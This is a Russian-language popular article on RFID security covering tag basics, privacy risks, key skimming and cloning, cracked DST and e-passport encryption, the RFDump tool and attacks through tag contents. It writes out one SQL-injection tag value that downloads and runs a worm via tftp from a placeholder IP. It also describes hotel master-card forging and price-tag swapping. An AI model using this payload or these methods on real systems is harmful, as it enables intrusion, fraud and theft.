Некоторые эксперты по безопасности настроены против использования технологии RFID для аутентификации людей, основываясь на риске кражи идентификатора. Например, атака «человек посередине» делает возможным атакующему в реальном времени украсть идентификатор личности. На данный момент, из за ограничений в ресурсах RFID-меток , теоретически не представляется возможным защитить их от таких атак, поскольку это требует сложных протоколов передачи данных.

Безопасность

Возможность незаметного дистанционного считывания RFID-метки вызывает опасения по поводу безопасности людей. Например, вор может незаметно для человека считать RFID-ключ от ее подъезда. Для этого ему даже не нужно брать ваш ключ в руки.

Считыватель вора может находиться в сумке, кармане или в элементах одежды, мебели и т.д.. Достаточно на долю секунды приблизить замаскированный считыватель к вашей сумочке или к карману, где находится RFID-ключ . Это может быть сделано в транспорте, на улице. Никто даже не прикоснется к вашим вещам, а ключ уже скопирован.

Воспроизвести точно такую ​​же метку достаточно сложно, если говорить о брелке или карточке. Но вора вид вашего ключа не интересует. А скопировать сигнал простой RFID метки (ключа) – дело не очень сложное. Если повторитель вашей метки будет размером пусть и с чемодан, он все равно откроет в ваш подъезд.

Относительно платежных систем, все будет не столь просто (данные на платежных карточках шифруются), но тоже можно получить неприятности.

В некоторых городах используют RFID карты для уплаты за проезд в городском транспорте. В этих системах с карты не только считывается, но и записывается на карту информация. То есть, есть возможность если не использовать, то хотя бы повредить информацию, хранящуюся на карте. Это может вызвать некоторый дискомфорт для одного человека, а может вызвать транспортный коллапс для всего города.

Для того, чтобы сделать невозможным или затруднить нелегальное считывания RFID-меток , нужно экранировать антенну RFID-меток . Мы знаем, что металлические предметы и металлизированные поверхности препятствуют прохождению электромагнитных волн. Также наличие воды, теоретически, может осложнить прохождение электромагнитных волн.

Для того, чтобы выяснить какие именно бытовые вещи помогут нам обезопасить себя от несанкционированного считывания RFID-меток, ключей, карт доступа или платежных карточ, проведем эксперимент.

Технология RFID

Краткое описание технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью устройств, называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации, позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть также сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году. Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тэг). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный, который уже принимается антенной ридера. Внутри карты или брелка содержится антенна в виде катушки тонкого провода.

По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя находится постоянно во времени (то есть не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора.

Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга, и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-тэги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют активными, а те, что без него, — полупассивными.

RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на:

  • низкочастотные (125 или 134,2 КГц);
  • высокочастотные (13,56 МГц);
  • UHF, то есть ультравысокочастотные (868-956 МГц);
  • микроволновые (2,45 ГГц).

Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб. Кроме того, метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету.

Применение: за и против

Применяться RFID может в самых разных областях. Во-первых, СКУД, то есть системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом — уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13,56 МГц. Реально новое направление в этой области - создание RFID-имплантатов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку - VeriChip.

Во-вторых, это контроль над перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах: достаточно пройтись с ридером вдоль полок с товарами — и все автоматически будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрихкодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным явлением, как сегодня штрихкод.

Еще одна очень важная область применения RFID - это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан. При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото.

Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки по своей сути являются радиомаяками - ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения. Большие опасения вызывает безопасность самой технологии. Сам Брюс Шнайер на планы оснащения паспортов RFID-метками, заявил, что «это чистая угроза национальной безопасности».

Конечно, такую важную технологию, как RFID, не могли оставить без внимания хакеры и различные исследователи информационной безопасности. Первое, на чем хотелось бы заострить внимание, — это проблема, связанная с вмешательством в личную жизнь человека, которая возможно будет иметь место в самом обозримом будущем. Только представь, что государство или же крупные корпорации будут иметь под контролем тысячи считывателей радиометок, расположенных на входе в метро, супермаркет или просто посреди улиц. Такие считыватели способны накапливать информацию о нашем перемещении, о том, какие товары мы только что приобрели в магазине. Конечно, сегодня это звучит несколько бредово, но пройдет, возможно, менее десятка лет, и наступит время, когда каждый из нас добровольно или же принудительно будет всегда носить с собой имплантированный под кожу идентификационный чип. Напоминает кино в жанре киберпанк? Как бы то ни было, все идет именно к этому.

RFID и хакеры

Австралийские исследователи компьютерной безопасности в апреле этого года опубликовали работу, в которой описывается возможность препятствования считыванию информации RFID-ридером с метки. В их планах — создание устройства, которое не позволит считывать информацию с RFID-меток без ведома их владельца. Они использовали метод, напоминающий DoS-атаку: радиоэфир захламляется огромным множеством сигналов, имитирующих сигналы меток. RFID-ридеры первого поколения, то есть пассивные, не имеют возможности считать данные с карты из-за вышеупомянутого явления - коллизии. Интересно, что более продвинутые интерактивные ридеры, как показали опыты, также напрочь уходят в даун.

Но с созданием первого анти-RFID гаджета австралийцев опередили голландцы. В начале апреля на околокомпьютерных сайтах запестрила новость о разработанном сотрудниками Свободного университета Амстердама устройства, которое препятствует чтению RFID-меток и информирует владельца о подобных попытках. Данный девайс разрабатывался в рамках проекта RFID Guardian (https://www.rfidguardian.org) группой исследователей под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), который, кроме этого, занимается еще рядом проектов, посвященных безопасности RFID-систем. Разработанное голландцами устройство представляет собой КПК с 550Mhz процессором и 64 Мб памяти, оборудованный RFID-ридером и необходимым ПО.

Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах «Хаоса», решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, — это простое уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженными хакерами, оказалось помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле, наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper"а обещают дальнейшее развитие проекта. RFID-Zapper вызвал у всех большой интерес на состоявшемся некоторое время назад европейском 22-м слете хакеров CCC.

Клонирование

Проблемы шифрования

ExxonMobil - крупнейшая нефтяная корпорация, владеющая сетью бензозаправочных станций в США. Она внедрила на своих заправочных станциях инновационную платежную систему SpeedPass: оплата осуществлялась с помощью брелока с RFID-чипом внутри, на котором записаны данные о платежном счете его владельца в системе SpeedPass. Трое исследователей компьютерной безопасности — Стив Боно (Steve Bono), Мэтью Грин (Matthew Green) и Адам Стаблфилд (Adam Stubblefield) — конкретно взялись за изучение этой системы. RFID-чипы, использовавшиеся в этой системе, представляли собой разработку Texas Instruments под названием Digital Signature Transponder (DST).

DST - это полупассивная радиометка с системой 40-битного шифрования. Хотя 40-битное шифрование сегодня достаточно легко вскрываются брутфорсом. Сложность вскрытия ключа заключалась в том, что сам алгоритм шифрования взломщикам был неизвестен. Но парням удалось восстановить его, используя различные криптоаналитические методы. Затем они собрали мощный кластер, который смог расшифровывать по 5 ключей менее чем за 2 часа. Позже было сконструировано устройство, эмулирующее работу DST, которое было проверено в действии на одной из станций ExxonMobil. После того как представители ExxonMobil ознакомились с результатами этого исследования (https://rfidanalysis.org), они заявили в прессе, что на практике все это не реализуемо, так как испытание «лабораторное». Но компания все же решила перестраховаться и перейти на чипы с 128-битным шифрованием.

Посмотрим, как обстоит дело с криптозащитой электронных документов. Нидерландские спецы по информационной безопасности из фирмы Riscure первыми взломали прототип электронного паспорта, который собираются вводить в Евросоюзе. Удалось им это вследствие достаточно простого алгоритма, примененного для шифрования личных данных владельца. Такая информация, как день рождения владельца паспорта, серийный номер, срок окончания его действия, легко предсказуема, и помогла «взломщикам» расшифровать остальное содержимое памяти радиометки.

Окончательно добил все представления о самой возможности безопасной RFID известнейший криптолог, профессор института Вейсмана Ади Шамир (Adi Shamir). Исследования ученый проводил на RFID-метках стандарта EPC (один из наиболее перспективных стандартов на сегодняшний день), работающих в UHF-диапазоне частот и использующих 8-ми и 32-битное шифрование данных. Для подбора ключа использовалась направленная антенна и цифровой осциллограф. Выяснилось, что при посылке чипу неверного бита ключа шифра энергопотребление RFID-чипа несколько возрастает, что может быть зафиксировано несложной аппаратурой. Таким образом, возможен взлом даже достаточно длинных ключей, причем в весьма короткое время. И это уже не проблема шифрования, а скорее проблема недоработки самой технологии RFID. Шамир представил также интересную идею о возможности создания девайса для расшифровки данных с UHF RFID-тэгов из обычного мобильника путем замены его ПО. Ведь GSM-мобилы и UHF-радиометки могут работать в одних и тех же частотах. Буду с нетерпением ждать, что получится из этой затеи.

Подмена содержимого памяти RFID-меток

Не спасает шифрование паспортов и от их клонирования. На завершившейся недавно хакерской конференции Defcon немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump , которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для пингвина. Для работы проги необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софтину время от времени кое-какие поправки. Например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а также проверка на ключи, выставляемые «по умолчанию». Скачать RFDump можно на сайте разработчиков: https://www.rf-dump.org.

После создания своей проги Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным:). Дальше — больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна из десяти изученных ими RFID-система из не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту, открывающую любую дверь. Но и системы с шифрованием очень просто обойти: либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрихкодам. Хакеры получили возможность с помощью карманных компьютеров поменять метки дорогостоящих товарах на менее дорогие, «спасая» таким образом свою наличность. По словам Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимы.

Атаки через RFID-метки

Но несанкционированное чтение и клонирование меток — это еще не все. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID. Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы - здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow.

Наиболее просто реализуема атака типа sql-injection. Допустим, приложение, работающее с RFID, записывает на метку какую-то информацию, например, если это коробка с товаром, говорящая о ее содержимом - «beer». Вот пример атаки на win-систему, уязвимую к sql-inj: хакер изменяет значение тэга на «beer"; EXEC Master..xp_cmdshell cd \Windows\Temp & tftp -i <здесь ip> GET worm.exe & worm.exe;» и загружает (конечно, если машина подключена к инету) таким образом червя в систему с БД товаров при считывании информации с метки.

Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода «» в уязвимую linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете.

Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тэгов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера, ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.

Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. Там выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса, распространяющегося через RFID. И им это удалось: первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета. Вирус распространяется через RFID-метки и заражает БД систем, использующих RFID.

Конечно, далеко не все RFID-системы подвержены подобного рода атакам. Таненбаум в своих исследованиях использовал не конкретную реализацию какой-то RFID-системы, а созданную для опытов лабораторную модель с модульной архитектурой, позволяющей изучать возможность атак на различные БД, используемых в реальных системах. И хотя производители RFID-систем подвергли критике исследования голландцев, думаю, с повсеместным распространением подобных систем окажется, что немалая их часть будет уязвима к разного рода хакерским атакам.

Сегодня к уязвимостям технологии RFID, кроме хакеров и исследователей компьютерной безопасности, проявляют интерес и представители криминального мира: разного рода мошенники, автоугонщики, террористы. Пытаясь привлечь внимание к опасностям, скрывающимся в использовании этой прогрессивной технологии, хакеры даже продемонстрировали возможность использования RFID-сканера в качестве детонатора взрывного устройства, реагирующего на метку, встроенную в паспорт человека, которого необходимо ликвидировать.

https://www.rfidguardian.org - сайт проекта RFID-Guardian

https://www.rfidvirus.org - здесь можно найти информацию о возможности распространения разного рода malware-кода через RFID, наработки по написанию RFID-вирусов и троев.

https://cq.cx - сайт эксперта по безопасности RFID-систем Джонатана Вестхьюза.

https://rfidanalysis.org - проект по взлому DST.

https://www.rf-dump.org - сайт создателей RFDump"а.